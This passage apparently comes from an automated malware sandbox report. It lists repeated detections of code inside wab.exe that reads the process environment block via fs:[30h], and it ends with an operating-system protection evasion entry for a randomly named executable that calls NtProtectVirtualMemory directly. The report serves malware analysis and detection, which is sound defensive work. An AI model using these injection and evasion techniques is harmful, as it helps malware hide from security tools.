        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246FA660 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_246F9660 mov eax, dword ptr fs:[00000030h]
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F9660 mov eax, dword ptr fs:[00000030h]12_2_246F9660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478866E mov eax, dword ptr fs:[00000030h]12_2_2478866E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478866E mov eax, dword ptr fs:[00000030h]12_2_2478866E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F2674 mov eax, dword ptr fs:[00000030h]12_2_246F2674
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DC640 mov eax, dword ptr fs:[00000030h]12_2_246DC640
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C262C mov eax, dword ptr fs:[00000030h]12_2_246C262C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DE627 mov eax, dword ptr fs:[00000030h]12_2_246DE627
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF626 mov eax, dword ptr fs:[00000030h]12_2_246BF626
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F6620 mov eax, dword ptr fs:[00000030h]12_2_246F6620
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24795636 mov eax, dword ptr fs:[00000030h]12_2_24795636
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F8620 mov eax, dword ptr fs:[00000030h]12_2_246F8620
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D260B mov eax, dword ptr fs:[00000030h]12_2_246D260B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F1607 mov eax, dword ptr fs:[00000030h]12_2_246F1607
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702619 mov eax, dword ptr fs:[00000030h]12_2_24702619
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FF603 mov eax, dword ptr fs:[00000030h]12_2_246FF603
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2473E609 mov eax, dword ptr fs:[00000030h]12_2_2473E609
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C3616 mov eax, dword ptr fs:[00000030h]12_2_246C3616
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C3616 mov eax, dword ptr fs:[00000030h]12_2_246C3616
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F36EF mov eax, dword ptr fs:[00000030h]12_2_246F36EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2473E6F2 mov eax, dword ptr fs:[00000030h]12_2_2473E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2473E6F2 mov eax, dword ptr fs:[00000030h]12_2_2473E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2473E6F2 mov eax, dword ptr fs:[00000030h]12_2_2473E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2473E6F2 mov eax, dword ptr fs:[00000030h]12_2_2473E6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247406F1 mov eax, dword ptr fs:[00000030h]12_2_247406F1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247406F1 mov eax, dword ptr fs:[00000030h]12_2_247406F1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477D6F0 mov eax, dword ptr fs:[00000030h]12_2_2477D6F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246ED6E0 mov eax, dword ptr fs:[00000030h]12_2_246ED6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246ED6E0 mov eax, dword ptr fs:[00000030h]12_2_246ED6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247536EE mov eax, dword ptr fs:[00000030h]12_2_247536EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247536EE mov eax, dword ptr fs:[00000030h]12_2_247536EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247536EE mov eax, dword ptr fs:[00000030h]12_2_247536EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247536EE mov eax, dword ptr fs:[00000030h]12_2_247536EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247536EE mov eax, dword ptr fs:[00000030h]12_2_247536EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247536EE mov eax, dword ptr fs:[00000030h]12_2_247536EE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F16CF mov eax, dword ptr fs:[00000030h]12_2_246F16CF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FA6C7 mov ebx, dword ptr fs:[00000030h]12_2_246FA6C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FA6C7 mov eax, dword ptr fs:[00000030h]12_2_246FA6C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB6C0 mov eax, dword ptr fs:[00000030h]12_2_246CB6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB6C0 mov eax, dword ptr fs:[00000030h]12_2_246CB6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB6C0 mov eax, dword ptr fs:[00000030h]12_2_246CB6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB6C0 mov eax, dword ptr fs:[00000030h]12_2_246CB6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB6C0 mov eax, dword ptr fs:[00000030h]12_2_246CB6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CB6C0 mov eax, dword ptr fs:[00000030h]12_2_246CB6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477F6C7 mov eax, dword ptr fs:[00000030h]12_2_2477F6C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247816CC mov eax, dword ptr fs:[00000030h]12_2_247816CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247816CC mov eax, dword ptr fs:[00000030h]12_2_247816CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247816CC mov eax, dword ptr fs:[00000030h]12_2_247816CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247816CC mov eax, dword ptr fs:[00000030h]12_2_247816CC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BD6AA mov eax, dword ptr fs:[00000030h]12_2_246BD6AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BD6AA mov eax, dword ptr fs:[00000030h]12_2_246BD6AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FC6A6 mov eax, dword ptr fs:[00000030h]12_2_246FC6A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B76B2 mov eax, dword ptr fs:[00000030h]12_2_246B76B2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B76B2 mov eax, dword ptr fs:[00000030h]12_2_246B76B2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B76B2 mov eax, dword ptr fs:[00000030h]12_2_246B76B2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F66B0 mov eax, dword ptr fs:[00000030h]12_2_246F66B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474368C mov eax, dword ptr fs:[00000030h]12_2_2474368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474368C mov eax, dword ptr fs:[00000030h]12_2_2474368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474368C mov eax, dword ptr fs:[00000030h]12_2_2474368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474368C mov eax, dword ptr fs:[00000030h]12_2_2474368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C4690 mov eax, dword ptr fs:[00000030h]12_2_246C4690
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C4690 mov eax, dword ptr fs:[00000030h]12_2_246C4690
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB765 mov eax, dword ptr fs:[00000030h]12_2_246BB765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB765 mov eax, dword ptr fs:[00000030h]12_2_246BB765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB765 mov eax, dword ptr fs:[00000030h]12_2_246BB765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BB765 mov eax, dword ptr fs:[00000030h]12_2_246BB765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C8770 mov eax, dword ptr fs:[00000030h]12_2_246C8770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D0770 mov eax, dword ptr fs:[00000030h]12_2_246D0770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702750 mov eax, dword ptr fs:[00000030h]12_2_24702750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24702750 mov eax, dword ptr fs:[00000030h]12_2_24702750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24744755 mov eax, dword ptr fs:[00000030h]12_2_24744755
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F674D mov esi, dword ptr fs:[00000030h]12_2_246F674D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F674D mov eax, dword ptr fs:[00000030h]12_2_246F674D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F674D mov eax, dword ptr fs:[00000030h]12_2_246F674D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D3740 mov eax, dword ptr fs:[00000030h]12_2_246D3740
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D3740 mov eax, dword ptr fs:[00000030h]12_2_246D3740
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D3740 mov eax, dword ptr fs:[00000030h]12_2_246D3740
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24793749 mov eax, dword ptr fs:[00000030h]12_2_24793749
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C0750 mov eax, dword ptr fs:[00000030h]12_2_246C0750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2473C730 mov eax, dword ptr fs:[00000030h]12_2_2473C730
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2479B73C mov eax, dword ptr fs:[00000030h]12_2_2479B73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2479B73C mov eax, dword ptr fs:[00000030h]12_2_2479B73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2479B73C mov eax, dword ptr fs:[00000030h]12_2_2479B73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2479B73C mov eax, dword ptr fs:[00000030h]12_2_2479B73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C3720 mov eax, dword ptr fs:[00000030h]12_2_246C3720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DF720 mov eax, dword ptr fs:[00000030h]12_2_246DF720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DF720 mov eax, dword ptr fs:[00000030h]12_2_246DF720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DF720 mov eax, dword ptr fs:[00000030h]12_2_246DF720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FC720 mov eax, dword ptr fs:[00000030h]12_2_246FC720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FC720 mov eax, dword ptr fs:[00000030h]12_2_246FC720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F273C mov eax, dword ptr fs:[00000030h]12_2_246F273C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F273C mov ecx, dword ptr fs:[00000030h]12_2_246F273C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F273C mov eax, dword ptr fs:[00000030h]12_2_246F273C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478972B mov eax, dword ptr fs:[00000030h]12_2_2478972B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C973A mov eax, dword ptr fs:[00000030h]12_2_246C973A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C973A mov eax, dword ptr fs:[00000030h]12_2_246C973A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477F72E mov eax, dword ptr fs:[00000030h]12_2_2477F72E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B9730 mov eax, dword ptr fs:[00000030h]12_2_246B9730
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246B9730 mov eax, dword ptr fs:[00000030h]12_2_246B9730
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F5734 mov eax, dword ptr fs:[00000030h]12_2_246F5734
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C5702 mov eax, dword ptr fs:[00000030h]12_2_246C5702
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C5702 mov eax, dword ptr fs:[00000030h]12_2_246C5702
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C7703 mov eax, dword ptr fs:[00000030h]12_2_246C7703
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FC700 mov eax, dword ptr fs:[00000030h]12_2_246FC700
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FF71F mov eax, dword ptr fs:[00000030h]12_2_246FF71F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246FF71F mov eax, dword ptr fs:[00000030h]12_2_246FF71F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C0710 mov eax, dword ptr fs:[00000030h]12_2_246C0710
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246F0710 mov eax, dword ptr fs:[00000030h]12_2_246F0710
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E27ED mov eax, dword ptr fs:[00000030h]12_2_246E27ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E27ED mov eax, dword ptr fs:[00000030h]12_2_246E27ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E27ED mov eax, dword ptr fs:[00000030h]12_2_246E27ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CD7E0 mov ecx, dword ptr fs:[00000030h]12_2_246CD7E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C47FB mov eax, dword ptr fs:[00000030h]12_2_246C47FB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C47FB mov eax, dword ptr fs:[00000030h]12_2_246C47FB
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246CC7C0 mov eax, dword ptr fs:[00000030h]12_2_246CC7C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C57C0 mov eax, dword ptr fs:[00000030h]12_2_246C57C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C57C0 mov eax, dword ptr fs:[00000030h]12_2_246C57C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C57C0 mov eax, dword ptr fs:[00000030h]12_2_246C57C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C07AF mov eax, dword ptr fs:[00000030h]12_2_246C07AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247937B6 mov eax, dword ptr fs:[00000030h]12_2_247937B6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BF7BA mov eax, dword ptr fs:[00000030h]12_2_246BF7BA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474F7AF mov eax, dword ptr fs:[00000030h]12_2_2474F7AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474F7AF mov eax, dword ptr fs:[00000030h]12_2_2474F7AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474F7AF mov eax, dword ptr fs:[00000030h]12_2_2474F7AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474F7AF mov eax, dword ptr fs:[00000030h]12_2_2474F7AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2474F7AF mov eax, dword ptr fs:[00000030h]12_2_2474F7AF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247497A9 mov eax, dword ptr fs:[00000030h]12_2_247497A9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246ED7B0 mov eax, dword ptr fs:[00000030h]12_2_246ED7B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2477F78A mov eax, dword ptr fs:[00000030h]12_2_2477F78A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_24795060 mov eax, dword ptr fs:[00000030h]12_2_24795060
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov ecx, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D1070 mov eax, dword ptr fs:[00000030h]12_2_246D1070
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EC073 mov eax, dword ptr fs:[00000030h]12_2_246EC073
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476705E mov ebx, dword ptr fs:[00000030h]12_2_2476705E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2476705E mov eax, dword ptr fs:[00000030h]12_2_2476705E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C2050 mov eax, dword ptr fs:[00000030h]12_2_246C2050
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246EB052 mov eax, dword ptr fs:[00000030h]12_2_246EB052
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478903E mov eax, dword ptr fs:[00000030h]12_2_2478903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478903E mov eax, dword ptr fs:[00000030h]12_2_2478903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478903E mov eax, dword ptr fs:[00000030h]12_2_2478903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2478903E mov eax, dword ptr fs:[00000030h]12_2_2478903E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BA020 mov eax, dword ptr fs:[00000030h]12_2_246BA020
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BC020 mov eax, dword ptr fs:[00000030h]12_2_246BC020
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DE016 mov eax, dword ptr fs:[00000030h]12_2_246DE016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DE016 mov eax, dword ptr fs:[00000030h]12_2_246DE016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DE016 mov eax, dword ptr fs:[00000030h]12_2_246DE016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246DE016 mov eax, dword ptr fs:[00000030h]12_2_246DE016
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247020F0 mov ecx, dword ptr fs:[00000030h]12_2_247020F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246C80E9 mov eax, dword ptr fs:[00000030h]12_2_246C80E9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BA0E3 mov ecx, dword ptr fs:[00000030h]12_2_246BA0E3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E50E4 mov eax, dword ptr fs:[00000030h]12_2_246E50E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246E50E4 mov ecx, dword ptr fs:[00000030h]12_2_246E50E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246BC0F0 mov eax, dword ptr fs:[00000030h]12_2_246BC0F0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247950D9 mov eax, dword ptr fs:[00000030h]12_2_247950D9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_247420DE mov eax, dword ptr fs:[00000030h]12_2_247420DE
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov ecx, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov ecx, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov ecx, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov ecx, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_246D70C0 mov eax, dword ptr fs:[00000030h]12_2_246D70C0

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe NtProtectVirtualMemory: Direct from: 0x77542F9C
